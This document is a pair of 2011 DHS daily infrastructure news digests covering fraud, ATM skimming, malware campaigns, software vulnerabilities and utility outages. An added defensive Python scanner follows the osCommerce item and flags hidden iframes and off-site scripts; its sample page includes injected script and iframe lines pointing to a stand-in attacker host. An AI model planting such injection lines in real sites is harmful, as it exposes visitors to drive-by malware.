Friday, July 29, 2011

Complete DHS Daily Report for July 29, 2011

Daily Report

Top Stories

• A new survey of global oil and gas IT executives found only half of the respondents have put in place a strategy to address information security threats, according to Infosecurity. (See item 3)

3. July 27, Infosecurity – (International) Half of oil and gas companies have no information security strategy in place. Only half of oil and gas companies have put in place a strategy to address information security threats, according to a survey of oil and gas IT executives by IDC Energy Insights. The survey of global IT executives also found oil and gas companies still lag behind other industries in formulating, approving, and executing information security policies, as well as in getting buy-in from senior management. Of the top three information security threats perceived by oil and gas companies, the greatest is state or industrial espionage, followed by employee error or accidental loss of sensitive information, and vulnerabilities owing to insecure code, the survey noted. In addition, 55 percent of survey respondents indicated an expected increase in their information security budget over the next 12 months. Only 10 percent of the respondents said they are using regulatory compliance as a requirement to justify budgets. In fact, almost 25 percent of respondents said the regulatory environment was a barrier to ensuring information security. Source:

• A massive water main break in the Bronx in New York City closed major transportation routes, damaged 12 blocks of businesses and homes, and knocked out gas service to hundreds, WABC 7 New York reports. (See item 26)

26. July 28, WABC 7 New York – (New York) Bronx residents clean up after water main break. It could be days before life returns to normal at homes and businesses in the Bronx in New York City after a massive water main break. It happened at Jerome Avenue and East 177th Street in Mount Hope July 27. The streets were dry late the morning of July 28, but big problems remained. There were ongoing bus disruptions, and 500 mom-and-pop shops and residential gas customers were waiting on Con Edison to hook service back up. Officials said all utility lines, including phone service, were affected in some way. There is a 6-foot deep crater in the middle of the street and 12 blocks of water damage to repair after the geyser-like break turned one of the Bronx's busiest streets into a bubbling river. The break in the 108-year-old main sent tens of thousands of gallons of water gushing along Jerome Avenue. It took crews nearly 3 hours to shut it off because that main supplies water to the entire city. The entrance to the Cross Bronx Expressway had to be shut down, and No. 4 subway service was stopped in its tracks for hours. A day later, Jerome Avenue remained closed, littered with soggy debris dragged from flooded basements. People spent the day cleaning up and adding up their losses. But the biggest problem, aside from all the water damage, is that Con Ed has to go door to door to restore gas service to those 500 homes and businesses. And still, no one knows what exactly caused the century-old main to break. "We need to investigate this," a New York City Department of Environmental Protection representative said. "Age in and of itself is not a reason why a main of this size and strength would break." Service on the BX32 and BX36 bus lines remained detoured. Source:

Banking and Finance Sector

14. July 28, Associated Press – (New York) Man disguised as armored truck guard steals $15K from Queens check-cashing business. The New York City Police Department said a man dressed as an armored truck guard walked out of a check-cashing business with $15,000 in cash the week of July 18. Police said the suspect walked into Lorenzo's Enterprises in Queens, said he was there for a pickup, and was handed the cash. They said he was wearing a GARDA Armored Courier uniform. The Daily News reported that workers at the check-cashing business did not suspect anything until an actual guard from the same armored truck company showed up hours later. The suspect remained at large as of July 27. Source:

15. July 27, New York Post – (New York) LI geezer bank bandit caught on tape. A hefty, gun-toting man believed to be responsible for a string of at least six bank robberies in New York since May is being hunted by Long Island police and the FBI. The squat, silver-haired bandit last struck July 26 at a Chase branch in Northport around 5:35 p.m. Armed with a black automatic handgun, he approached a teller at the bank at 721 Fort Salonga Road and demanded cash. The teller handed over the money and the subject fled on foot southbound through the parking lot. He is described as a white male in his 60s, 5 feet, 5 inches tall, and weighing 250 lbs. "We think he either has help, or parks a get-away car nearby," said the commanding officer of Nassau County's homicide and major crimes division. Police believe the man is also responsible for a similar bank robbery July 6 in Newburgh, New York. Source:

16. July 27, San Diego Union-Tribune – (California) Alleged ID thief stole $200,000 in debit-card scam. An alleged identity thief was charged July 27 with looting more than $200,000 from customer accounts at a Rancho Penasquitos, California bank by using an electronic device to steal debit card information. The suspect is accused of stealing from about 950 customers at the Chase Bank branch on Black Mountain Road, but authorities said that number may go up if more victims come forward. He was arraigned before a San Diego Superior Court judge on 45 counts of identity theft, grand theft, burglary, making fake ID cards, and a special allegation that losses exceeded $200,000, the prosecutor said. She said charges related to about 900 more victims would be added against the man, a legal U.S. resident from Romania. He has a felony conviction for trying to break into an ATM in Los Angeles County in 2008, she said. Bank investigators discovered a man was installing a card-skimming device on the door of the bank’s ATM lobby every Saturday after closing time. He would remove it before the bank reopened on Mondays, a district attorney’s investigator said. This occurred for 6 weeks in a row. Hidden cameras the man is accused of installing showed customers typing their identification numbers on the ATM keypads. Agents believe he transferred the account information onto fake debit cards to withdraw $300, $500, even $1,000 at a time at other ATMs. The bank notified the Secret Service of the scam July 22. Agents, with San Diego police and the regional fraud task force, were watching the bank July 23 when the suspect returned to retrieve his device, and he was arrested. Source:

17. July 25, U.S. Department of Justice – (New York) Four charged with running a credit history repair scheme. The U.S. Attorney for the Southern District of New York and the U.S. Secret Service New York Field Office announced July 25 the unsealing of an indictment charging four people in connection with a fraudulent credit repair scheme. As part of the scheme, the defendants falsely reported to credit bureaus inflated credit histories for thousands of individuals, enabling those individuals to get millions of dollars in loans from financial institutions, and other lenders. From 2007 through 2009, through Highway Furniture Inc. and, later, New York Funding Group Inc., the four defendants engaged in a scheme to falsely and fraudulently improve credit histories and scores of thousands of people who purportedly were customers of the two firms. The individuals had never actually been customers of Highway Furniture, and New York Funding. As part of the scheme, in exchange for thousands of dollars in fees, the defendants provided credit bureaus with fictitious data showing their firms had extended credit to the purported customers, and that the loans had been or were being repaid. The defendants falsely and fraudulently improved credit histories and scores of some of the purported customers by deleting accurate, but negative, credit information maintained by credit bureaus. As a result, the purported customers obtained millions of dollars of loans from banks, and other lenders. Each defendant is charged with one count of conspiracy to commit bank fraud, and one count of conspiracy to cause damage to a protected computer. Source:

Information Technology Sector

37. July 28, Softpedia – (International) LiveJournal targeted in massive DDoS attack. LiveJournal experienced downtime during the past several days because of a massive distributed denial-of-service attack that overwhelmed the company's servers. The outages began July 26, but the company did not release a statement until July 27, when it confirmed it was the target of an attack. LiveJournal is one of the oldest blogging platforms, dating back to 1999, and has over 30 million registered accounts. LiveJournal appeared to be available as of July 28, but since the attack is ongoing, the service might experience more outages. Source:

38. July 28, Help Net Security – (International) Oracle Enterprise Manager Grid Control multiple vulnerabilities. Oracle reported its Enterprise Manager Grid Control has multiple problems. A remote issue in Security Framework can be exploited over the "HTTP" protocol; the "User Model" sub-component is affected. A remote issue in EMCTL can be exploited over the "HTTP" protocol. A remote issue in CMDB Metadata & Instance APIs can be exploited over the "Oracle NET" protocol. A remote vulnerability in Database Control can be exploited over the "HTTP" protocol. Several versions of Oracle Enterprise Manager Grid Control are affected. Source:

39. July 28, Softpedia – (International) Fake IRS emails distribute new file infector variant. Security researchers from Trend Micro warn that a wave of fake Internal Revenue Service e-mails directs recipients to a new variant of the LICAT file-infecting virus. LICAT is a piece of malware associated with the Zeus banking trojan that first appeared in October 2010. Malware analysts believe LICAT is intended as a distribution and update mechanism for Zeus. The virus appends its rogue code to legitimate EXE, DLL, and HTML files. Each time one of the infected files is executed, a list of URLs is generated according to a predefined algorithm similar to the one used by Conficker. The Zeus trojan normally updates itself from a list of predefined command-and-control servers, and losing control of those domain names usually means losing control of the entire botnet. LICAT adds a redundancy mechanism: it tries to access all of the generated URLs and downloads a new Zeus version if it finds one. If they lose control of their C&C domains, the attackers can register in advance a domain they know LICAT will generate, upload their new version there, and simply wait. The rogue e-mails detected by Trend Micro purport to come from "Payment IRS(dot)gov" and bear the subject "Internal Revenue Service United States Department of the Treasury." Source:

40. July 27, IDG News Service – (International) Beware of 'wrong transaction' hotel spam. A new spam campaign began to appear in recent days, and there are already hundreds of variants on the same theme: a hotel wrongly charged a credit card, and the victim is supposed to fill out an attached form to process the refund. The "refund" form is actually a malicious trojan that installs fake antivirus software on the victim's computer, according to the director of research in computer forensics at the University of Alabama at Birmingham, who blogged about the spam messages July 27. The messages appear to be coming from the same botnet of infected computers that recently sent out similar messages warning victims their credit card payments were overdue. Those messages led to fake antivirus downloads too, the researcher wrote in his blog post. As of late July 27, only 19 of the 43 antivirus products used by the VirusTotal Web site detected this latest trojan program. Source:

41. July 25, CNET News – (International) Street View cars grabbed locations of phones, PCs. Google's Street View cars collected the locations of millions of laptops, cell phones, and other Wi-Fi devices around the world, a practice that raises novel privacy concerns, CNET confirmed. The cars were supposed to collect the locations of Wi-Fi access points. However, Google also recorded the street addresses and unique identifiers of computers and other devices using those wireless networks, and then made the data publicly available until several weeks ago. The French data protection authority, known as the Commission Nationale de l'Informatique et des Libertes, recently contacted CNET and said its investigation confirmed Street View cars collected these unique hardware IDs. Source:

Communications Sector

42. July 27, Winfield Daily Courier – (Kansas) Telephone service interrupted. Southern Kansas Telephone (SKT) customers in Cowley County and other towns in southeast Kansas have services back after one of SKT’s fiber optic lines was accidentally cut July 27. According to SKT's customer care director, at about 7:55 a.m. July 27, a construction company working near Belle Plaine was boring under a highway when they accidentally cut a fiber optic line that provides telephone, high-speed Internet, and cable television service to SKT customers in Belle Plaine and other communities in southeast Kansas, including Dexter, Burden, and Cedar Vale. SKT repair crews arrived onsite shortly after the cut to begin work on repairing the damaged fiber optic cable. Source:

43. July 27, Tallahassee Democrat – (Florida) Cable repairs have been completed. A cut cable north of Tallahassee, Florida, interrupted Comcast's television, Internet, and communications service to about 6,000 customers in that area, the company said July 27. Comcast's general manager said the line was a 78-count fiber optic cable that relays signals to customers along Thomasville Road and up to Bradfordville. Repair of the cable began within an hour of the reported outage. The above-ground cable was accidentally cut early July 27 by crews that were clearing tree limbs from the lines. Comcast finished the fiber optic cable repair at 3:20 p.m. Source:

Thursday, July 28, 2011

Complete DHS Daily Report for July 28, 2011

Daily Report

Top Stories

• Trusteer reports the SpyEye bank-credential-stealing botnet doubled in size, reaching financial institutions in many more countries, according to IDG News Service. (See item 23)

• One of two remaining intact levees in Holt County, Missouri, is in danger of collapse and releasing flood waters on the town of Forbes and 10,000 acres of farmland, WDAF 4 Kansas City reports. (See item 61)

61. July 26, WDAF 4 Kansas City – (Missouri) Missouri River still threatens Holt County levees. Water levels along the flood-swollen Missouri River have begun to drop, but the danger is not over for parts of northwest Missouri, where flood waters threaten one of the two remaining intact levees in Holt County, WDAF 4 Kansas City reported July 26. In Fortescue, north of St. Joseph, the population shrank from 51 to 2 due to flooding. Many corn fields in the area died after being underwater, and the remaining roads are largely unused. Levee Number 7 was in danger of collapse; crews have been working since the weekend of July 23 and 24 to repair a 50-foot hole gouged out by the river, with an additional 300 feet of damage on either side of the hole. The levee protects the town of Forbes and roughly 10,000 acres of farmland. "Found it 11 o'clock [July 23] morning, and started delivering rock by 8 o'clock that night," said one levee worker. Truckloads of rock were being dumped into the hole to save the levee. Source:

Banking and Finance Sector

19. July 26, Bloomberg – (International) TD Bank sued by trustee liquidating Rothstein law firm. Toronto-Dominion Bank (TD) was sued July 25 by the bankruptcy trustee liquidating Rothstein Rosenfeldt Adler PA for allegedly assisting in a $1.2 billion Ponzi scheme run by the Florida law firm’s former chairman. The chairman pleaded guilty in January 2010 to five counts of racketeering, money laundering, and wire fraud, admitting he sold investors interests in bogus settlements in fake sexual-harassment and whistleblower cases. The bank’s authorized agents let the man use its name, facilities, and accounts to deceive investors, the trustee said. He accused the bank of ignoring “red flags” and letting the lawyer open accounts and transfer “huge sums” of money among them. “TD Bank played a central role in this massive fraud by giving [his] settlement program the appearance of legitimacy,” the trustee said in a filing July 25 in U.S. Bankruptcy Court in Fort Lauderdale, Florida. The firm collapsed after other attorneys there said they found evidence their chairman was running an illegal side business. TD Bank was a “linchpin” in the scheme and disregarded numerous red flags, including hundreds of millions of dollars that moved out of law firm trust accounts, investors said in a complaint filed November 2009 in Florida state court. The investors accused the bank of breach of fiduciary duty, aiding and abetting fraud, and negligent misrepresentation. The investors, with more than $150 million in losses, seek “extensive relief” from the chairman and 27 co-conspirator defendants, according to court papers. Source:

20. July 26, Associated Press – (International) Ex-investment manager, known as Wall Street 'bad boy,' convicted of fraud. A former investment manager known as Wall Street's "bad boy" was convicted July 26 of defrauding U.S. and European investors of $140 million, promising them rich returns while blowing their money on a lifestyle that included private jets, home renovations, prostitutes, strippers, and classy London hotels. The verdict convicted him of conspiracy and securities fraud charges. The jury also convicted a co-defendant from Miami, Florida. The convicted fraudster was the former chief executive officer of the brokerage firm Sky Capital, which had offices in London, New York, Florida, and New Jersey. His co-defendant was a senior broker for the firm. The top charge, securities fraud, alone carries a potential sentence of up to 20 years in prison. Prosecutors portrayed the two defendants as con men, saying they capitalized on the excitement over Internet tech stocks by using their broker-dealer operation to solicit private investments in start-ups. Prosecutors said the defendants spent some of the investor money living lavishly with private jets, expensive vacations, fancy cars, and flashy watches. They said the men manipulated the value of stocks they sold to investors by paying brokers 400 percent commissions to promote the stocks. The scheme came to an end when one of the brokers was caught lying to an FBI undercover officer. Source:

21. July 26, KOMO 4 Seattle – (International) Police capture woman wanted in major ATM 'skimming' operation. Police may have cracked part of a major identity theft ring July 24 after a woman was caught placing a card "skimmer" on a bank ATM in Lynnwood, Washington. The 42-year-old woman was booked into jail for investigation of 20 counts of identity theft, and investigators said she is suspected in hundreds of similar cases and has ties to an international organized crime group. According to court documents, an investigator with Chase Bank spotted the woman placing the skimmer on an ATM. Investigators said security camera video from the ATM showed the woman installing the skimmer. The bank investigator recognized the woman from numerous surveillance videos taken at ATMs affixed with skimmers from California to Mount Vernon, Washington, according to the documents. The woman is also the subject of a federal investigation into skimming and ID theft, and the Secret Service was called to interview her at Lynnwood police headquarters. In a statement of probable cause, police wrote the Secret Service believes the suspect has ties to organized crime in Romania and is a flight risk if released. Chase has been investigating the woman since February and has her on video placing skimmers on eight ATMs in the area, the court documents said. Those skimmers allegedly recorded the account information of at least 320 people. The bank investigator estimated the losses from the skimming at about $34,000. Source:

22. July 26, Associated Press – (Connecticut) Conn. man pleads guilty to swindling churchgoers. A Connecticut securities broker pleaded guilty July 26 to charges he swindled investors, including members of a Greek Orthodox church, out of more than $8 million. Federal authorities said the 51-year-old Easton man pleaded guilty to fraud and money laundering charges in U.S. district court in New Haven. Prosecutors said the man convinced officials and some parishioners at St. Barbara Greek Orthodox Church in Orange that he was an investment manager, and misrepresented his successes. Prosecutors have said church members lost retirement and college funds. Authorities said he used the money to support his auto racing businesses, and for personal bills. He will be sentenced in October. Source:

23. July 26, IDG News Service – (International) SpyEye Trojan defeating online banking defenses. Banks are facing more trouble from SpyEye, a piece of malicious software that steals money from people's online bank accounts, according to new research from security vendor Trusteer. In its latest versions, SpyEye has been modified with new code designed to evade advanced systems banks have put in place to block fraudulent transactions, said Trusteer's chief executive officer (CEO). Banks are now analyzing how a person uses their site, looking at parameters such as how many pages a person views, the amount of time a person spends on a page, and the time it takes a person to execute a transaction. Other indicators include IP address, such as when a person who normally logs in from the Miami, Florida area suddenly logs in from St. Petersburg, Russia. SpyEye can automatically initiate a transaction much faster than an average person working manually on the Web site, which gives banks a key trigger for blocking a transaction. So SpyEye's authors are now trying to mimic — albeit in an automated way — how a real person would navigate a Web site. Trusteer has also noticed that SpyEye in recent months has expanded the number of financial institutions it is able to target, in an increasing number of countries. New target countries include Russia, Saudi Arabia, Bahrain, Oman, Venezuela, Belarus, Ukraine, Moldova, Estonia, Latvia, Finland, Japan, Hong Kong, and Peru. What that means is that more criminal groups around the world are purchasing the SpyEye toolkit, Trusteer's CEO said. SpyEye is a botnet with a network of command-and-control servers hosted around the world. As of July 26, 46 command-and-control servers were online, according to SpyEye Tracker, a Web site dedicated to gathering statistics about the malicious software. In May, there were just 20 or so active servers responding to computers infected with SpyEye, said the site's administrator. Source:

Information Technology Sector

48. July 27, H Security – (International) ICQ vulnerable to account theft. In security advisories for ICQ and the ICQ Web site, a security researcher warned that the ICQ instant messenger for Windows and the ICQ Web site contain vulnerabilities that potentially allow attackers to take control of a user's ICQ account. According to the researcher, ICQ does not adequately check users' profile information and fails to properly analyze status messages, which can be freely chosen by users, to see if they contain executable code. He recently discovered a similar hole in the Skype client. If the victim opens the attacker's profile in the ICQ client or on the ICQ Web site, the embedded JavaScript code stored on the ICQ server is executed. This can allow attackers to steal victims' cookies and take control of their sessions. The script code appears to be executed in a local context; therefore, attackers can potentially also execute applications and read the user's local files. Such an attack is called a persistent cross-site scripting attack: the attacker manages to place JavaScript code on a server that will be executed on the victim's machine when a particular Web site is visited or a particular application is used. Source:

49. July 27, H Security – (International) Vulnerability in Samba SWAT tool. A cross-site request forgery vulnerability and a related cross-site scripting vulnerability in the SWAT administration tool of the Samba SMB/CIFS and Windows interoperability software triggered the release of updates for versions 3.3, 3.4, and 3.5 of the software. With the request forgery problem, an attacker could trick an authenticated user into clicking a manipulated URL on a different Web page and gain control of SWAT. If that user is authenticated as the root user on the system, it is possible to start or stop the service and add or remove shares, printers, or user accounts. The SWAT tool has to be installed and enabled as either a stand-alone server or as an Apache CGI plug-in to be vulnerable; by default, SWAT is neither installed nor enabled. The cross-site scripting vulnerability only exists if the request forgery problem is not fixed, and allows an attacker to insert arbitrary content into the user field of the change-password pages of SWAT. Source:

50. July 27, Softpedia – (International) osCommerce mass injection attack infects over 90K pages. Security researchers from Armorize came across a new mass injection attack targeting osCommerce Web sites that has already infected more than 90,000 pages. Attackers began by injecting a hidden iframe pointing to a malicious URL, but later switched to a rogue script element that loads a rogue JavaScript file from an external domain. The injected code does not appear to be obfuscated, so searching for it on Google revealed more than 90,000 hits, indicating the attack is widespread. Both versions of the injection take visitors through several redirects until landing them on a page that loads exploits for vulnerabilities in browser plug-ins and popular applications. This type of attack, known as a drive-by download, is very dangerous because it requires no user interaction and there is usually little to no indication that something malicious has happened. According to the Armorize researchers, this attack exploits vulnerabilities in Java (CVE-2010-0840 and CVE-2010-0886), Adobe Reader (CVE-2010-0188), Internet Explorer (CVE-2006-0003), and Windows XP (CVE-2010-1885). Since these vulnerabilities are relatively old, users who keep their software and operating system up to date should be protected against the attack. Source:
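The two injection shapes Armorize describes (a hidden iframe, then an unobfuscated script element loading JavaScript from an external domain) are simple enough to check for in a site's own rendered pages. The scanner below is an added example, not code from Armorize or from the original report; the trusted host list and the sample page are constructed for illustration, and `attacker.invalid` is a placeholder host.

```python
"""Flag hidden iframes and off-site script elements in a page's HTML.

Added example for the osCommerce mass-injection item. Stdlib only, so a site
operator can run it offline over saved page sources or a crawler's output.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the shop legitimately loads scripts from (constructed for this example;
# a real deployment fills this from the site's own templates).
TRUSTED_HOSTS = {"shop.example.com", "cdn.example.com"}

# Inline-style fragments commonly used to keep an injected iframe out of view.
HIDDEN_STYLE_MARKERS = ("display:none", "visibility:hidden", "width:0", "height:0")


def _is_hidden(attrs):
    """True if the element is styled or sized so a visitor would not see it."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if any(marker in style for marker in HIDDEN_STYLE_MARKERS):
        return True
    width, height = attrs.get("width"), attrs.get("height")
    if width is None or height is None:
        return False  # no explicit size: do not guess
    try:
        return int(width) <= 1 and int(height) <= 1
    except ValueError:
        return False


def _is_external(src, trusted):
    """True if the URL points at a host outside the trusted set.

    Relative URLs (no host) resolve to the site itself and are not external.
    """
    host = urlparse(src).hostname
    return bool(host) and host.lower() not in trusted


class InjectionFinder(HTMLParser):
    """Collects (kind, src) findings while the page is parsed."""

    def __init__(self, trusted):
        super().__init__()
        self.trusted = trusted
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}  # names already lowercased
        src = a.get("src", "")
        if tag == "iframe" and src and _is_hidden(a):
            self.findings.append(("hidden-iframe", src))
        elif tag == "script" and src and _is_external(src, self.trusted):
            self.findings.append(("external-script", src))


def find_injections(html, trusted=TRUSTED_HOSTS):
    """Return a list of (kind, src) tuples for suspicious elements in `html`."""
    finder = InjectionFinder({h.lower() for h in trusted})
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page: one legitimate script, one legitimate iframe, and
# both injection shapes from the report.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example.com/jquery.js"></script>
<script src="http://attacker.invalid/stat.js"></script>
</head><body>
<h1>Shop</h1>
<iframe src="http://attacker.invalid/in.php" style="display: none"></iframe>
<iframe src="https://shop.example.com/help" width="400" height="300"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, src in find_injections(SAMPLE_PAGE):
        print(f"{kind}: {src}")
```

Run over every page of a site and diff the findings against a known-good baseline; a `width:0` marker also matches `min-width:0`, so review hits rather than auto-removing them.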

51. July 26, The Register – (International) Kit steals Mac login passwords through FireWire port. Software maker Passware released a program that quickly recovers log-in passwords from Macs that have been locked, put into sleep mode, or have FileVault disk encryption turned on, even when running Apple's new OS X Lion. Passware Kit Forensic v11 works by capturing a Mac's memory over FireWire and extracting any log-in passwords that happen to be stored there. The package takes only a few minutes to work, and can also extract passwords stored in a Mac's keychain. The program exploits the peer-to-peer characteristic of the FireWire design, which allows any connected device to read and write the memory of any other connected device. As a result, anything stored in a Mac's memory is accessible. Source:

Communications Sector

52. July 27, KMTR 16 Springfield – (Oregon) Phone service restored, suspect arrested. A man stealing wire from telephone lines was probably the cause of a telephone outage for about 1,000 residents of the Junction City, Oregon area July 26, according to the Lane County Sheriff’s Office. Phone service was restored by the evening of July 26 for most customers. Around 11:30 p.m., deputies investigating a report of a suspicious vehicle in a remote area of Bureau of Land Management land found a man who was apparently preparing to alter the appearance of some wire to make it easier to sell as scrap. Deputies arrested the 45-year-old man, and he was taken to jail on suspicion of theft, criminal mischief, and possession of methamphetamine. Source:

53. July 26, WKTV 2 Utica – (New York) Severe weather knocks Galaxy radio stations off the air. Galaxy Communications radio stations were off the air due to damage from severe weather that swept through Oneida County in New York the afternoon of July 26. According to a spokesperson for the group of radio stations, WOUR, WKLL (KRock), WUMX (Mix 102.5), and ESPN Radio (WTLB, WIXT, WRNY) were all off the air. It was also reported that Galaxy's facilities on Kellogg Road in Washington Mills suffered minor damage following the storm. The company said all of its radio stations were expected to return to the airwaves the evening of July 26. Source: